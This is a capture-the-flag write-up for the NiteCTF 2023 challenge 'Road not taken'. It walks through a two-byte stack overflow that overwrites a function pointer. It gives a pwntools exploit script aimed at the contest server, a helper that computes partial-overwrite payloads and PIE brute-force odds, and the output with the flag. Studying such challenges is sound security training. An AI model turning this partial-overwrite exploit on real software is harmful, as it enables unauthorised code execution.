# NiteCTF 2023 : Road not taken

## Context

We're given a binary and a remote server to be exploited.

## Writeup
Opening the binary in a decompiler, we find this pseudo-C code:

```c
void main(void)
{
    undefined local_218 [520];   /* 520-byte input buffer */
    code *local_10;              /* function pointer, placed right after the buffer */

    setbuf(stdout,(char *)0x0);
    setbuf(stdin,(char *)0x0);
    local_10 = wrongdirection;
    puts("Can you please lead me to the right direction to get to the flag?");
    read(0,local_218,522);       /* reads 2 bytes more than the buffer holds */
    (*local_10)();
    return;
}
```
There's a function pointer and a 520-byte array. Further down, we notice that 522 bytes are read into that array, so there is clearly a buffer overflow here: the two extra bytes land in the function pointer, which sits right after the buffer on the stack and is initially set to `wrongdirection`. There's a function named `rightdirection` that prints our flag, so we simply have to rewrite the function pointer so it points to `rightdirection`, which is at offset 0x1159.

To do so, we can run this script:
```python
from pwn import *

#r = process("./the_road_not_taken1")
r = remote("34.100.142.216", 1337)
elf = ELF('./the_road_not_taken1')

# Offsets of both functions inside the (PIE) binary
addr_right_dir = elf.symbols["rightdirection"]
addr_wrong_dir = elf.symbols["wrongdirection"]
print(f'{hex(addr_right_dir)=}')
print(f'{hex(addr_wrong_dir)=}')

print(r.recvuntil(b"flag?\n").decode())
# 520 bytes fill the buffer; the next two bytes overwrite the low half of the
# function pointer. read() stops after 522 bytes, so the trailing "\x00" and
# the newline added by sendline() are never consumed.
r.sendline(b"a"*520 + b"\x59\x11\x00")
print(r.recv().decode())
```
Because PIE is enabled, only the low 12 bits of a code address are fixed by the file layout; the upper nibble of the second byte we overwrite (the `1` in `0x11`) is randomized on every run, so the payload only works about one run in sixteen. We have to run the script multiple times, but it eventually works and gives us our flag:
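To make the "run it multiple times" step concrete, here is an added example (not part of the writeup) that works out which bytes of a PIE code address are fixed by the file layout and how many of the overwritten bits must be guessed; `partial_overwrite` and `PAGE_BITS` are my own names, and the offsets are the ones the script printed.

```python
# Added example: which bytes of a PIE address survive ASLR, and why the
# two-byte overwrite used above is a 1-in-16 guess.
#
# A PIE binary is mapped at a page-aligned base, so bits 0-11 of every code
# address come straight from the ELF offsets; this treats every bit from 12
# up as random, which is an upper bound on the real ASLR entropy.
PAGE_BITS = 12


def partial_overwrite(current_off: int, target_off: int, nbytes: int):
    """Overwrite the low `nbytes` of a pointer that holds `current_off` so it
    points at `target_off` (both are ELF offsets).

    Returns (payload_bytes, expected_attempts); expected_attempts is 1 when
    the overwrite touches no randomized bit.
    """
    width = nbytes * 8
    if not 1 <= nbytes <= 8:
        raise ValueError("a pointer is 1 to 8 bytes")
    # Bytes we do not write keep the pointer's existing (randomized) value,
    # so the target must agree with the current pointer above `width` bits.
    if (current_off >> width) != (target_off >> width):
        raise ValueError(f"{target_off:#x} unreachable with a {nbytes}-byte overwrite")
    # Every randomized bit inside the overwritten region has to be guessed;
    # a 1-in-2**k chance means 2**k attempts on average.
    random_bits = max(0, width - PAGE_BITS)
    payload = (target_off & ((1 << width) - 1)).to_bytes(nbytes, "little")
    return payload, 1 << random_bits


# Offsets printed by the exploit script above.
WRONG = 0x117e  # wrongdirection
RIGHT = 0x1159  # rightdirection

if __name__ == "__main__":
    for n in (1, 2):
        payload, tries = partial_overwrite(WRONG, RIGHT, n)
        print(f"{n}-byte overwrite: send {payload!r}, ~{tries} attempt(s) on average")
```

Since both functions share everything above their low byte here, a one-byte overwrite needs no guess at all, which is why only the 2-byte variant in the script depends on luck.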
```
$ py exploit.py
[+] Opening connection to 34.100.142.216 on port 1337: Done
[*] '/home/ravaka/ctf/nitectf/pwn/road_not_taken/the_road_not_taken1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
hex(addr_right_dir)='0x1159'
hex(addr_wrong_dir)='0x117e'
Can you please lead me to the right direction to get to the flag?
Thanks for the help
nite{R0b3rT_fro5t_ftw_32dx5hp}
[*] Closed connection to 34.100.142.216 port 1337
```